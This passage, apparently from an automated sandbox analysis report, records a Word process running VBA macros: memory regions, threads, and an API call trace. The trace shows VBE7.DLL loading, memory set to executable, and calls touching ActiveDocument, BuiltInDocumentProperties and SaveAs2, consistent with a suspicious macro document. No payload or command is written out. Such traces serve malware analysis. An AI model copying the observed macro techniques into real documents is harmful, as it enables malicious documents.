end_va = 0xfaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000fa0000"
filename = ""
Region:
id = 1658
start_va = 0xf90000
end_va = 0xf9ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f90000"
filename = ""
Region:
id = 1692
start_va = 0xfa0000
end_va = 0xfaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000fa0000"
filename = ""
Region:
id = 1693
start_va = 0xf90000
end_va = 0xf9ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f90000"
filename = ""
Region:
id = 1859
start_va = 0x68b0000
end_va = 0x68effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000068b0000"
filename = ""
Region:
id = 1860
start_va = 0xb2b0000
end_va = 0xb3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b2b0000"
filename = ""
Region:
id = 1861
start_va = 0x7efd5000
end_va = 0x7efd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 1862
start_va = 0x660e0000
end_va = 0x66105fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "alrtintl.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\alrtintl.dll")
Region:
id = 1863
start_va = 0x660b0000
end_va = 0x660d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "alrtintl.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\alrtintl.dll")
Region:
id = 1864
start_va = 0xf90000
end_va = 0xfb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "alrtintl.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\alrtintl.dll")
Region:
id = 1865
start_va = 0xf90000
end_va = 0xfc1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f90000"
filename = ""
Region:
id = 1866
start_va = 0xb7b0000
end_va = 0xcb04fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll"
filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll")
Region:
id = 1867
start_va = 0x3380000
end_va = 0x3380fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui")
Region:
id = 1868
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1869
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1870
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1871
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1872
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1873
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1874
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1875
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1876
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1877
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1878
start_va = 0xb170000
end_va = 0xb270fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b170000"
filename = ""
Region:
id = 1879
start_va = 0xb170000
end_va = 0xb270fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b170000"
filename = ""
Region:
id = 1880
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1881
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1882
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1883
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1884
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1885
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1886
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1887
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1888
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1889
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1890
start_va = 0xb170000
end_va = 0xb270fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b170000"
filename = ""
Region:
id = 1891
start_va = 0xb170000
end_va = 0xb270fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b170000"
filename = ""
Region:
id = 1892
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1893
start_va = 0x3390000
end_va = 0x33fdfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003390000"
filename = ""
Region:
id = 1894
start_va = 0x3400000
end_va = 0x346dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003400000"
filename = ""
Region:
id = 1895
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1896
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1897
start_va = 0x3390000
end_va = 0x341dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003390000"
filename = ""
Region:
id = 1898
start_va = 0xcb10000
end_va = 0xcf0ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000000cb10000"
filename = ""
Region:
id = 1899
start_va = 0x3390000
end_va = 0x340ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1900
start_va = 0xcb10000
end_va = 0xcf0ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000000cb10000"
filename = ""
Region:
id = 1901
start_va = 0x3390000
end_va = 0x340ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1902
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1903
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1904
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1905
start_va = 0x3390000
end_va = 0x3390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003390000"
filename = ""
Region:
id = 1906
start_va = 0x3390000
end_va = 0x3446fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbd.ttf"
filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf")
Region:
id = 1907
start_va = 0x75400000
end_va = 0x75408fff
monitored = 0
entry_point = 0x754015a6
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll")
Thread:
id = 1
os_tid = 0xdb4
Thread:
id = 2
os_tid = 0xdb0
Thread:
id = 3
os_tid = 0xdac
Thread:
id = 4
os_tid = 0xda8
Thread:
id = 5
os_tid = 0xda4
Thread:
id = 6
os_tid = 0xd84
Thread:
id = 7
os_tid = 0xd80
Thread:
id = 8
os_tid = 0xd7c
Thread:
id = 9
os_tid = 0xd78
Thread:
id = 10
os_tid = 0xd74
Thread:
id = 11
os_tid = 0xd70
Thread:
id = 12
os_tid = 0xd6c
Thread:
id = 13
os_tid = 0xd60
[0060.222] DispCallFunc (pvInstance=0x6ea0b5c, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x317c90) returned 0x0
[0060.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x669211d3, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x317ba0 | out: lpThreadId=0x317ba0*=0xe1c) returned 0x830
[0060.223] PeekMessageA (in: lpMsg=0x317b80, hWnd=0x10324, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x317b80) returned 0
[0060.227] GetActiveWindow () returned 0x102ec
[0060.228] CRetailMalloc_Alloc () returned 0x6f2e400
[0060.228] CRetailMalloc_Realloc () returned 0x6e0aa78
[0060.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x37f273a, cbMultiByte=4, lpWideCharStr=0x317364, cchWideChar=5 | out: lpWideCharStr="hny") returned 4
[0060.229] CRetailMalloc_Realloc () returned 0x6ef2198
[0060.229] CRetailMalloc_Realloc () returned 0x6daa488
[0060.230] CRetailMalloc_Alloc () returned 0x6ec9038
[0060.230] CRetailMalloc_Alloc () returned 0x6ed9858
[0060.230] CRetailMalloc_Alloc () returned 0x6ed98c8
[0060.230] CRetailMalloc_Alloc () returned 0x6e98e00
[0060.230] CRetailMalloc_Alloc () returned 0x6e99028
[0060.230] CRetailMalloc_Alloc () returned 0x6e99250
[0060.230] CRetailMalloc_Alloc () returned 0x6ef20f0
[0060.230] CRetailMalloc_Alloc () returned 0x6ef20a8
[0060.230] CRetailMalloc_Alloc () returned 0x6ef2168
[0060.230] CRetailMalloc_Alloc () returned 0x6ef1df0
[0060.230] CRetailMalloc_Alloc () returned 0x6ea8618
[0060.230] CRetailMalloc_Alloc () returned 0x6ef22d0
[0060.231] CRetailMalloc_Free () returned 0x1ca0201
[0060.231] CRetailMalloc_Realloc () returned 0x5bd0cf0
[0060.231] CRetailMalloc_Realloc () returned 0x6edf9c8
[0060.231] CRetailMalloc_Realloc () returned 0x6ef1ef8
[0060.231] CRetailMalloc_Realloc () returned 0x5c1a090
[0060.231] CRetailMalloc_Alloc () returned 0x6f3aab8
[0060.231] CRetailMalloc_Realloc () returned 0x6f2e400
[0060.231] CRetailMalloc_Free () returned 0x16a0001
[0060.231] GetCurrentProcess () returned 0xffffffff
[0060.231] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b2c, dwSize=0x14) returned 1
[0060.231] VirtualProtect (in: lpAddress=0x6e97b2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x31728c | out: lpflOldProtect=0x31728c*=0x40) returned 1
[0060.232] GetCurrentProcess () returned 0xffffffff
[0060.232] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b2d, dwSize=0x2) returned 1
[0060.232] GetCurrentProcess () returned 0xffffffff
[0060.232] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b4c, dwSize=0x14) returned 1
[0060.232] VirtualProtect (in: lpAddress=0x6e97b4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x31728c | out: lpflOldProtect=0x31728c*=0x40) returned 1
[0060.232] GetCurrentProcess () returned 0xffffffff
[0060.232] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b4d, dwSize=0x2) returned 1
[0060.232] GetCurrentProcess () returned 0xffffffff
[0060.232] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b6c, dwSize=0x14) returned 1
[0060.232] VirtualProtect (in: lpAddress=0x6e97b6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x31728c | out: lpflOldProtect=0x31728c*=0x40) returned 1
[0060.233] GetCurrentProcess () returned 0xffffffff
[0060.233] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b6d, dwSize=0x2) returned 1
[0060.233] GetCurrentProcess () returned 0xffffffff
[0060.233] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b8c, dwSize=0x14) returned 1
[0060.233] VirtualProtect (in: lpAddress=0x6e97b8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x31728c | out: lpflOldProtect=0x31728c*=0x40) returned 1
[0060.233] GetCurrentProcess () returned 0xffffffff
[0060.233] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b8d, dwSize=0x2) returned 1
[0060.234] free (_Block=0x0)
[0060.234] free (_Block=0x0)
[0060.234] free (_Block=0x0)
[0060.234] CRetailMalloc_Alloc () returned 0x6ef22d0
[0060.234] CRetailMalloc_Free () returned 0x1ca0201
[0060.234] CRetailMalloc_Alloc () returned 0x6dd99c0
[0060.234] GetCurrentProcess () returned 0xffffffff
[0060.234] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e98e52, dwSize=0xc) returned 1
[0060.234] VirtualProtect (in: lpAddress=0x6e98e52, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x317634 | out: lpflOldProtect=0x317634*=0x4) returned 1
[0060.234] free (_Block=0x0)
[0060.234] free (_Block=0x0)
[0060.234] free (_Block=0x0)
[0060.235] GetAsyncKeyState (vKey=3) returned 0
[0060.235] CRetailMalloc_Realloc () returned 0x6ea4f90
[0060.235] CRetailMalloc_Alloc () returned 0x6f2e450
[0060.235] CRetailMalloc_Realloc () returned 0x6e0aa98
[0060.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6ec602c, cbMultiByte=12, lpWideCharStr=0x3aa007c, cchWideChar=26 | out: lpWideCharStr="i7Gigabyte.h") returned 12
[0060.236] CRetailMalloc_Realloc () returned 0x6e99478
[0060.236] CRetailMalloc_Realloc () returned 0x5c1a218
[0060.236] realloc (_Block=0x0, _Size=0x100) returned 0x8e6fd10
[0060.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6ec603c, cbMultiByte=8, lpWideCharStr=0x3aa00d2, cchWideChar=18 | out: lpWideCharStr="comments") returned 8
[0060.236] CRetailMalloc_Realloc () returned 0x5c6e1c8
[0060.236] CRetailMalloc_Realloc () returned 0x6ef22d0
[0060.236] CRetailMalloc_Realloc () returned 0x6f3ac50
[0060.237] CRetailMalloc_Alloc () returned 0x6df3938
[0060.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36129b6, cbMultiByte=5, lpWideCharStr=0x317324, cchWideChar=6 | out: lpWideCharStr="Trim") returned 5
[0060.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36129b6, cbMultiByte=5, lpWideCharStr=0x317324, cchWideChar=6 | out: lpWideCharStr="Trim") returned 5
[0060.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36129b6, cbMultiByte=5, lpWideCharStr=0x317324, cchWideChar=6 | out: lpWideCharStr="Trim") returned 5
[0060.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36129b6, cbMultiByte=5, lpWideCharStr=0x317324, cchWideChar=6 | out: lpWideCharStr="Trim") returned 5
[0060.239] CRetailMalloc_Alloc () returned 0x6ef22e8
[0060.239] _mbscpy_s (in: _Dst=0x6ef22e8, _DstSizeInBytes=0x5, _Src=0x36129b6 | out: _Dst=0x6ef22e8) returned 0x0
[0060.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3612a76, cbMultiByte=12, lpWideCharStr=0x317334, cchWideChar=13 | out: lpWideCharStr="_B_var_Trim") returned 12
[0060.240] CRetailMalloc_Realloc () returned 0x7bf8d0
[0060.240] CRetailMalloc_Realloc () returned 0x5c8a688
[0060.240] CRetailMalloc_Free () returned 0x1b20201
[0060.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x361298e, cbMultiByte=12, lpWideCharStr=0x317324, cchWideChar=13 | out: lpWideCharStr="processorI9") returned 12
[0060.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x361298e, cbMultiByte=12, lpWideCharStr=0x317324, cchWideChar=13 | out: lpWideCharStr="processorI9") returned 12
[0060.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x361298e, cbMultiByte=12, lpWideCharStr=0x317324, cchWideChar=13 | out: lpWideCharStr="processorI9") returned 12
[0060.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x361298e, cbMultiByte=12, lpWideCharStr=0x317324, cchWideChar=13 | out: lpWideCharStr="processorI9") returned 12
[0060.241] CRetailMalloc_Alloc () returned 0x6e0aab8
[0060.241] _mbscpy_s (in: _Dst=0x6e0aab8, _DstSizeInBytes=0xc, _Src=0x361298e | out: _Dst=0x6e0aab8) returned 0x0
[0060.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3612a9e, cbMultiByte=19, lpWideCharStr=0x317334, cchWideChar=20 | out: lpWideCharStr="_B_var_processorI9") returned 19
[0060.241] _mbscpy_s (in: _Dst=0x31739c, _DstSizeInBytes=0xc, _Src=0x361298e | out: _Dst=0x31739c) returned 0x0
[0060.241] CRetailMalloc_Free () returned 0xdd20001
[0060.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x361269a, cbMultiByte=15, lpWideCharStr=0x317324, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15
[0060.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x361269a, cbMultiByte=15, lpWideCharStr=0x317324, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15
[0060.246] CRetailMalloc_Realloc () returned 0x6ef21e0
[0060.246] CRetailMalloc_Realloc () returned 0x6daa3c8
[0060.248] CRetailMalloc_Alloc () returned 0x6da9f48
[0060.248] CRetailMalloc_Realloc () returned 0x6edfa20
[0060.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x361269a, cbMultiByte=15, lpWideCharStr=0x3172e4, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15
[0060.249] CRetailMalloc_Realloc () returned 0x5c8a890
[0060.249] CRetailMalloc_Realloc () returned 0x5bd0cc8
[0060.249] CRetailMalloc_Realloc () returned 0x6edfa78
[0060.250] CRetailMalloc_Alloc () returned 0x6e996a0
[0060.250] CRetailMalloc_Realloc () returned 0x6e998c8
[0060.251] CRetailMalloc_Alloc () returned 0x6daa488
[0060.251] CRetailMalloc_Realloc () returned 0x6ea2198
[0060.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36129da, cbMultiByte=8, lpWideCharStr=0x3172fc, cchWideChar=9 | out: lpWideCharStr="SaveAs2") returned 8
[0060.251] CRetailMalloc_Realloc () returned 0x5ba5a58
[0060.251] CRetailMalloc_Alloc () returned 0x6ef2198
[0060.251] _mbscpy_s (in: _Dst=0x6ef2198, _DstSizeInBytes=0x9, _Src=0x36129fe | out: _Dst=0x6ef2198) returned 0x0
[0060.251] SysStringByteLen (bstr="FileName") returned 0x10
[0060.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FileName", cchWideChar=8, lpMultiByteStr=0x317220, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FileNameDr1", lpUsedDefaultChar=0x0) returned 8
[0060.251] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="FileName", cchCount1=-1, lpString2="FileName", cchCount2=-1) returned 2
[0060.252] CRetailMalloc_Free () returned 0x1af0201
[0060.252] CRetailMalloc_Alloc () returned 0x6ef2198
[0060.252] _mbscpy_s (in: _Dst=0x6ef2198, _DstSizeInBytes=0xb, _Src=0x3612a26 | out: _Dst=0x6ef2198) returned 0x0
[0060.252] SysStringByteLen (bstr="FileName") returned 0x10
[0060.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FileName", cchWideChar=8, lpMultiByteStr=0x317220, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FileNameDr1", lpUsedDefaultChar=0x0) returned 8
[0060.252] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="FileName", cchCount1=-1, lpString2="FileFormat", cchCount2=-1) returned 3
[0060.252] SysStringByteLen (bstr="FileFormat") returned 0x14
[0060.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FileFormat", cchWideChar=10, lpMultiByteStr=0x317220, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FileFormat1", lpUsedDefaultChar=0x0) returned 10
[0060.252] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="FileFormat", cchCount1=-1, lpString2="FileFormat", cchCount2=-1) returned 2
[0060.253] CRetailMalloc_Free () returned 0x1af0201
[0060.253] CRetailMalloc_Realloc () returned 0x6f2f028
[0060.254] CRetailMalloc_Realloc () returned 0x5ba5e60
[0060.256] CRetailMalloc_Alloc () returned 0x6f3ac50
[0060.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x66b5ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9
[0060.258] CRetailMalloc_Realloc () returned 0x6e99af0
[0060.258] CRetailMalloc_Realloc () returned 0x6e99d18
[0060.258] CRetailMalloc_Realloc () returned 0x6f2e450
[0060.258] CRetailMalloc_Free () returned 0x16a0001
[0060.258] GetCurrentProcess () returned 0xffffffff
[0060.259] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e98e52, dwSize=0xc) returned 1
[0060.259] VirtualProtect (in: lpAddress=0x6e98e52, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x3171f4 | out: lpflOldProtect=0x3171f4*=0x40) returned 1
[0060.259] SetErrorMode (uMode=0x8001) returned 0x8001
[0060.261] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1
[0060.261] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x66920000
[0060.265] SetErrorMode (uMode=0x8001) returned 0x8001
[0060.265] GetProcAddress (hModule=0x66920000, lpProcName=0x208) returned 0x669a8105
[0060.266] GetAsyncKeyState (vKey=3) returned 0
[0060.266] CRetailMalloc_Alloc () returned 0x6f2fb80
[0060.266] realloc (_Block=0x0, _Size=0x100) returned 0x8e6fe18
[0060.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x37f27a6, cbMultiByte=15, lpWideCharStr=0x317024, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15
[0060.267] CRetailMalloc_Realloc () returned 0x6ee24b8
[0060.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3612826, cbMultiByte=26, lpWideCharStr=0x31705c, cchWideChar=27 | out: lpWideCharStr="BuiltInDocumentProperties") returned 26
[0060.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x361285e, cbMultiByte=7, lpWideCharStr=0x316e38, cchWideChar=6 | out: lpWideCharStr="Value") returned 0
[0060.270] CRetailMalloc_Realloc () returned 0x6f0c730
[0060.270] wcscpy_s (in: _Destination=0x6e99730, _SizeInWords=0x6, _Source="Value" | out: _Destination="Value") returned 0x0
[0060.272] CRetailMalloc_Realloc () returned 0x6f2fb80
[0060.272] CRetailMalloc_Free () returned 0x1320001
[0060.272] GetCurrentProcess () returned 0xffffffff
[0060.272] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b2c, dwSize=0x14) returned 1
[0060.272] VirtualProtect (in: lpAddress=0x6e97b2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x316f4c | out: lpflOldProtect=0x316f4c*=0x40) returned 1
[0060.273] GetCurrentProcess () returned 0xffffffff
[0060.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b2d, dwSize=0x2) returned 1
[0060.273] GetCurrentProcess () returned 0xffffffff
[0060.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b4c, dwSize=0x14) returned 1
[0060.273] VirtualProtect (in: lpAddress=0x6e97b4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x316f4c | out: lpflOldProtect=0x316f4c*=0x40) returned 1
[0060.274] GetCurrentProcess () returned 0xffffffff
[0060.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b4d, dwSize=0x2) returned 1
[0060.274] GetCurrentProcess () returned 0xffffffff
[0060.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b6c, dwSize=0x14) returned 1
[0060.274] VirtualProtect (in: lpAddress=0x6e97b6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x316f4c | out: lpflOldProtect=0x316f4c*=0x40) returned 1
[0060.274] GetCurrentProcess () returned 0xffffffff
[0060.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b6d, dwSize=0x2) returned 1
[0060.274] GetCurrentProcess () returned 0xffffffff
[0060.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b8c, dwSize=0x14) returned 1
[0060.274] VirtualProtect (in: lpAddress=0x6e97b8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x316f4c | out: lpflOldProtect=0x316f4c*=0x40) returned 1
[0060.275] GetCurrentProcess () returned 0xffffffff
[0060.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b8d, dwSize=0x2) returned 1
[0060.275] GetAsyncKeyState (vKey=3) returned 0
[0060.469] CRetailMalloc_Alloc () returned 0x6f51258
[0060.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36126c6, cbMultiByte=8, lpWideCharStr=0x316f7c, cchWideChar=9 | out: lpWideCharStr="Content") returned 8
[0060.471] CRetailMalloc_Realloc () returned 0x6ee34c8
[0060.472] CRetailMalloc_Realloc () returned 0x6ea1470
[0060.472] CRetailMalloc_Realloc () returned 0x6f64a38
[0060.472] realloc (_Block=0x0, _Size=0x20) returned 0x8e6ff20
[0060.473] realloc (_Block=0x0, _Size=0x60) returned 0x8e6ff48
[0060.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5c8a49c, cbMultiByte=3, lpWideCharStr=0x3850748, cchWideChar=8 | out: lpWideCharStr="s3x") returned 3
[0060.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5c8a4a8, cbMultiByte=0, lpWideCharStr=0x38507b4, cchWideChar=2 | out: lpWideCharStr="") returned 0
